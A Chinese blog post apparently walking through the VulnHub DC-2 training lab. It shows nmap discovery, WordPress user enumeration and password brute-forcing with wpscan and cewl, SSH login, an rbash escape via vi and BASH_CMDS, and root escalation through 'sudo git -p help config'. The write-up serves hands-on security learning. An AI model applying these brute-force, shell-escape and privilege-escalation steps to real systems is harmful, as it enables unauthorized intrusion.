DC-2靶机

最新推荐文章于 2025-01-22 21:42:52 发布
最新推荐文章于 2025-01-22 21:42:52 发布
阅读量208 收藏 4
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zdd1453691081/article/details/141091931
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/dc-2,311/

(1)扫描ip

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:0D:44:4E'

(2) 发现访问不到了,我们回过去看扫描结果,其实已经告诉我们了没有遵循重定向到http://dc-2/

(3) 访问一个网站时,计算机首先会检查我们的本地hosts文件,那我们直接修改一下hosts文件就好了(修改后本机可以访问)

(4) 在kali里也配置一下hosts (修改后kali里面可以访问到)

(5)访问成功

(6)目录扫描

(7)拼接wp-admin访问到登陆页面

(8)用wpscan --url http://dc-2 -e u 跑出用户名

(9) 用cewl工具爬取dc-2这个网页上的内容,作为爆破的密码字典

(10)爆破出密码

jerry / adipiscing
tom / parturient

getshell:

(1)连接ssh

ssh jerry@192.168.254.151 -p 7744

(2)jerry账号连接不到,换tom账号,连接成功

ssh tom@192.168.254.151 -p 7744

提权:

(1)执行命令发现很多命令无法执行

(2)查看可执行命令,发现vi命令可以执行

compgen -c

(3)vi flag3.txt,提示提权后再看jerry和su

(4)输入

:set shell=/bin/bash
:shell

(5)vi查看

vi flag4.txt

(6)说没有提示,但是最后一句git outta here,应该在提示使用git,但是sudo -l无法查看,不确定,绕过rbash,切到jerry

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

(7)查看当前权限

su jerry 
adipiscing
sudo -l

(8)git拥有root权限,执行命令,提权成功

sudo git -p help config
!/bin/sh

(9)切到root家目录,查看最后一个flag文件

DC-2靶机渗透测试全过程
2401_88083440的博客
02-06 956
(1)本来这里想做一下痕迹清除的,但看了很多日志发现并没有我们攻击机的记录(感觉很奇怪)(2)通过DC-2靶机,学习到的知识有:WordPress WPScan Cewl 以及绕过rbash,希望我能再多掌握一些工具(3)并且还回顾了一下痕迹清除这块有问题的地方欢迎各位师傅提出!
DC-2靶机进行渗透测试
zll___的博客
03-11 1123
DC-2靶机进行渗透测试
DC-2靶机渗透
weixin_45349299的博客
01-02 831
title: DC-2靶机渗透详解 date: 2022-1-1 23 :38 :36 tags: DC系列靶机 categories: 学习笔记kali攻击机:192.168.1.103靶机:192.168.2.102,以10000的速率扫描靶机的所有端口,对指定端口的服务做综合详细扫描打不开192.168.2.108:80的原因:没有在本地设置hosts本地hosts文件位置:C:\Windows\System32\drivers\etc添加192.168.2.102 dc-2然后用更新dns缓存查询D
靶场DC-2靶机详解
2401_84693966的博客
09-27 1532
与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。看到了,访问不到且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。
DC-2靶机详解
苏生要努力
03-03 1565
写写自己打DC-2的过程使用工具DC-2靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-2靶机攻略
weixin_43179779的博客
10-16 2001
DC-2靶机攻略
DC-2靶机渗透测试过程(个人学习)
m0_59028058的博客
07-12 1371
使用tom目录查看当前文件夹下的文件可以发先flag3.txt文件,使用 cat 命令显示存在 rbash 限制,这里可以用 vi 来查看flag3.txt文件中的内容。在探测端口和服务的时候可以发现靶机开放了一个ssh端口,只不过不是默认的22端口,是7744端口,尝试利用jerry和tom账户ssh连接。扫描出来可以就可以发现80端口存在一个无法重定向的问题,我们访问网页无法重定向到dc-2这个域名中,则需要修改一下hosts文件。在flag3的提示中,提示了“su”,可能需要用到sudo提权。
DC系列】DC-2靶机渗透教程
2401_83116349的博客
01-22 1039
dc-2渗透全教程
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 3110
DC-2靶机渗透测试思路及流程
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 2699
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8713
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
卷积神经网络,本项目是根据CNN理论思想,使用C#编码的项目,为使用C#人员,更快速的清晰的理解,CNN的底层计算过程从而了解卷积思想。.zip
06-08
卷积神经网络(Convolutional Neural Networks, CNN),本项目是根据CNN理论思想,使用C#编码的项目,为使用C#人员,更快速的清晰的理解,CNN的底层计算过程从而了解卷积思想。
【模板】日语模板_ANKI牌组_卡片_备考记忆.apkg
06-08
【模板】日语模板_ANKI牌组_卡片_备考记忆.apkg
AI生成美女图片带货项目玩法教程:电商领域实操与变现策略拆解
最新发布
06-08
AI生成美女图片带货项目玩法教程:电商领域实操与变现策略拆解
2006-2023年 地级市-绿色全要素生产率.rar
06-08
该数据集涵盖2006-2023年中国地级市层面的绿色全要素生产率(GTFP)测算结果,包含280余个城市的原始数据与计算结果,采用超效率SBM模型、Malmquist指数等方法,综合考虑资本存量(永续盘存法计算)、劳动力投入、能源消耗等生产要素,以及GDP作为期望产出,工业废水、二氧化硫等作为非期望产出。数据来源包括《中国城市统计年鉴》、各省市统计年鉴及环境公报,经线性插值处理缺失值,提供DTA、XLS等多格式文件。适用于研究区域绿色发展效率、环境规制政策效果等议题,实证分析中可直接用于DEA或Stata等软件测算。
河北工业大学HEBUT教务处网站验证码识别.zip
06-08
河北工业大学HEBUT教务处网站验证码识别
DC-1靶机渗透测试攻略及DC-2靶机简介
靶机DC-2,尽管在标题和描述中未被提及,但从文件名称列表中可以得知,它也是Vulnhub系列中的一个靶机。根据名称推断,DC-2可能与DC-1具有相似的主题或设计理念,但具体细节和挑战会有所差异,测试人员在面对DC-2时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值